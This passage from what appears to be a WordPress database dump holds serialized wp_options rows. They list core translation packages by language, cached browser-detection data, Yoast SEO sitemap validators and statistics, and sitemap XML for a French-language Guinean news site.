nynorsk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:7:\"Punjabi\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-20 08:02:58\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.1.20\";s:7:\"updated\";s:19:\"2015-03-29 22:19:48\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.1.20/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 13:10:35\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-29 08:57:23\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-22 18:42:30\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-11 07:32:16\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 14:14:27\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-29 12:16:07\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 18:45:50\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-07 10:21:58\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-28 12:07:44\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-16 14:19:30\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-07 02:08:56\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-30 02:38:08\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 22:07:36\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-05 09:23:39\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:9:\"Uyƣurqə\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-02 17:05:02\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 09:15:16\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-15 05:40:58\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-03 09:08:47\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-12 11:35:05\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-15 21:19:35\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 00:37:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','no'),(1855,'_site_transient_timeout_browser_c99fd505b5898ec7d13b183483752241','1512135806','no'),(1856,'_site_transient_browser_c99fd505b5898ec7d13b183483752241','a:10:{s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:3:\"9.0\";s:8:\"platform\";s:4:\"iPad\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:1;}','no'),(1903,'wpseo_sitemap_624_cache_validator','4Hr2x','no'),(1904,'_site_transient_timeout_browser_9b56bc9123e5943b8e99376c93989c32','1512224444','no'),(1905,'_site_transient_browser_9b56bc9123e5943b8e99376c93989c32','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"61.0.3163.100\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(1920,'_site_transient_timeout_community-events-28d8e2923e202babcd5179949478ed29','1511662852','no'),(1921,'_site_transient_community-events-28d8e2923e202babcd5179949478ed29','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:13:\"197.149.220.0\";}s:6:\"events\";a:1:{i:0;a:7:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:11:\"WordCamp US\";s:3:\"url\";s:29:\"https://2017.us.wordcamp.org/\";s:6:\"meetup\";s:0:\"\";s:10:\"meetup_url\";s:0:\"\";s:4:\"date\";s:19:\"2017-12-01 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:18:\"Nashville, TN, USA\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:36.15660849999999726378518971614539623260498046875;s:9:\"longitude\";d:-86.7784908999999942125214147381484508514404296875;}}}}','no'),(1947,'wpseo_sitemap_395_cache_validator','4BGjW','no'),(1980,'wpseo_sitemap_930_cache_validator','422XV','no'),(2101,'wpseo_sitemap_295_cache_validator','4JCAb','no'),(2102,'wpseo_sitemap_578_cache_validator','4JCAX','no'),(2103,'wpseo_sitemap_300_cache_validator','4JCBl','no'),(2104,'wpseo_sitemap_289_cache_validator','4JCBJ','no'),(2105,'wpseo_sitemap_post_format_cache_validator','4JCCn','no'),(2106,'wpseo_sitemap_284_cache_validator','4JCCF','no'),(2107,'wpseo_sitemap_278_cache_validator','4JCCU','no'),(2108,'wpseo_sitemap_272_cache_validator','4JCD9','no'),(2109,'wpseo_sitemap_266_cache_validator','4JCDr','no'),(2110,'wpseo_sitemap_258_cache_validator','4JCDF','no'),(2111,'wpseo_sitemap_252_cache_validator','4JCDT','no'),(2112,'wpseo_sitemap_249_cache_validator','4JCE8','no'),(2113,'wpseo_sitemap_246_cache_validator','4JCEm','no'),(2114,'wpseo_sitemap_240_cache_validator','4JCEA','no'),(2115,'wpseo_sitemap_312_cache_validator','4JCEP','no'),(2116,'wpseo_sitemap_306_cache_validator','4JCF4','no'),(2117,'wpseo_sitemap_255_cache_validator','4JCFh','no'),(2118,'wpseo_sitemap_234_cache_validator','4JCFw','no'),(2119,'wpseo_sitemap_228_cache_validator','4JCFS','no'),(2120,'wpseo_sitemap_222_cache_validator','4JCG7','no'),(2121,'wpseo_sitemap_216_cache_validator','4JCGq','no'),(2122,'wpseo_sitemap_210_cache_validator','4JCGM','no'),(2123,'wpseo_sitemap_198_cache_validator','4JCGZ','no'),(2124,'wpseo_sitemap_204_cache_validator','4JCHd','no'),(2125,'wpseo_sitemap_193_cache_validator','4JCHq','no'),(2126,'wpseo_sitemap_187_cache_validator','4JCHG','no'),(2127,'wpseo_sitemap_181_cache_validator','4JCHT','no'),(2128,'wpseo_sitemap_175_cache_validator','4JCI6','no'),(2129,'wpseo_sitemap_163_cache_validator','3hQM','no'),(2130,'wpseo_sitemap_169_cache_validator','nLu4','no'),(2131,'wpseo_sitemap_157_cache_validator','nLuh','no'),(2132,'wpseo_sitemap_151_cache_validator','nLuu','no'),(2133,'wpseo_sitemap_145_cache_validator','nLuH','no'),(2134,'wpseo_sitemap_139_cache_validator','nLv1','no'),(2135,'wpseo_sitemap_127_cache_validator','nLvf','no'),(2136,'wpseo_sitemap_133_cache_validator','4JCJY','no'),(2137,'wpseo_sitemap_121_cache_validator','4JCKE','no'),(2138,'wpseo_sitemap_115_cache_validator','4JCLd','no'),(2139,'wpseo_sitemap_109_cache_validator','4JCLq','no'),(2140,'wpseo_sitemap_103_cache_validator','4JCLE','no'),(2141,'wpseo_sitemap_97_cache_validator','4JCLR','no'),(2142,'wpseo_sitemap_91_cache_validator','4JCM5','no'),(2143,'wpseo_sitemap_85_cache_validator','4JCMj','no'),(2144,'wpseo_sitemap_79_cache_validator','4JCMx','no'),(2145,'wpseo_sitemap_73_cache_validator','4JCMM','no'),(2146,'wpseo_sitemap_67_cache_validator','4JCN2','no'),(2147,'wpseo_sitemap_56_cache_validator','4JCNi','no'),(2148,'wpseo_sitemap_61_cache_validator','4JCNw','no'),(2149,'wpseo_sitemap_50_cache_validator','4JCNL','no'),(2150,'wpseo_sitemap_44_cache_validator','4JCNZ','no'),(2151,'wpseo_sitemap_38_cache_validator','4JCOe','no'),(2152,'wpseo_sitemap_26_cache_validator','4JCOs','no'),(2153,'wpseo_sitemap_32_cache_validator','4JCOH','no'),(2154,'wpseo_sitemap_20_cache_validator','4JCOU','no'),(2155,'wpseo_sitemap_14_cache_validator','4JCP9','no'),(2156,'wpseo_sitemap_8_cache_validator','4JCPn','no'),(2253,'wpseo_sitemap_668_cache_validator','4OR9j','no'),(2254,'wpseo_sitemap_661_cache_validator','4OR9I','no'),(2315,'_site_transient_timeout_browser_cb0f25941c7ee58acd15fece4d84c18b','1512982593','no'),(2316,'_site_transient_browser_cb0f25941c7ee58acd15fece4d84c18b','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"62.0.3202.94\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(2399,'_transient_timeout_yst_sm_page_1:47KvK_4172G','1512697296','no'),(2400,'_transient_yst_sm_page_1:47KvK_4172G','C:24:\"WPSEO_Sitemap_Cache_Data\":1701:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:1653:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/</loc>\n		<lastmod>2017-11-27T11:32:39+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/technologie/</loc>\n		<lastmod>2017-11-01T15:35:41+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/economie/</loc>\n		<lastmod>2017-11-01T15:39:24+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/culture-2/</loc>\n		<lastmod>2017-11-01T15:44:33+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/agriculture/</loc>\n		<lastmod>2017-11-01T15:45:36+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/sante/</loc>\n		<lastmod>2017-11-01T15:47:38+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/culture/</loc>\n		<lastmod>2017-11-01T15:57:34+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/societe/</loc>\n		<lastmod>2017-11-01T16:02:28+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/autres/</loc>\n		<lastmod>2017-11-01T16:06:03+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/contact-2/</loc>\n		<lastmod>2017-11-01T16:25:25+00:00</lastmod>\n	</url>\n</urlset>\";}}','no'),(2410,'_site_transient_timeout_browser_b912b77c9df611085048e5b46605d7ee','1513240957','no'),(2411,'_site_transient_browser_b912b77c9df611085048e5b46605d7ee','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"62.0.3202.94\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(2420,'_transient_timeout_wpseo-statistics-totals','1512746733','no'),(2421,'_transient_wpseo-statistics-totals','a:1:{i:1;a:2:{s:6:\"scores\";a:3:{i:0;a:4:{s:8:\"seo_rank\";s:3:\"bad\";s:5:\"label\";s:65:\"Articles avec un score SEO <strong>peut être amélioré</strong>\";s:5:\"count\";s:2:\"12\";s:4:\"link\";s:116:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=bad\";}i:1;a:4:{s:8:\"seo_rank\";s:2:\"ok\";s:5:\"label\";s:46:\"Articles avec un score SEO <strong>OK</strong>\";s:5:\"count\";s:1:\"8\";s:4:\"link\";s:115:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=ok\";}i:2;a:4:{s:8:\"seo_rank\";s:2:\"na\";s:5:\"label\";s:49:\"Articles <strong>sans</strong> mot-clé principal\";s:5:\"count\";s:1:\"2\";s:4:\"link\";s:115:\"https://guineeinnove.nimbasolution.com/wp-admin/edit.php?post_status=publish&#038;post_type=post&#038;seo_filter=na\";}}s:8:\"division\";a:5:{s:3:\"bad\";d:0.545454545454545414173708195448853075504302978515625;s:2:\"ok\";d:0.36363636363636364645657295113778673112392425537109375;s:4:\"good\";i:0;s:2:\"na\";d:0.0909090909090909116141432377844466827809810638427734375;s:7:\"noindex\";i:0;}}}','no'),(2447,'_transient_timeout_yst_sm_1_1:47KvK_fcdE','1512771586','no'),(2448,'_transient_yst_sm_1_1:47KvK_fcdE','C:24:\"WPSEO_Sitemap_Cache_Data\":550:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:503:\"<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<sitemap>\n		<loc>https://guineeinnove.nimbasolution.com/post-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</sitemap>\n	<sitemap>\n		<loc>https://guineeinnove.nimbasolution.com/page-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:32:39+00:00</lastmod>\n	</sitemap>\n	<sitemap>\n		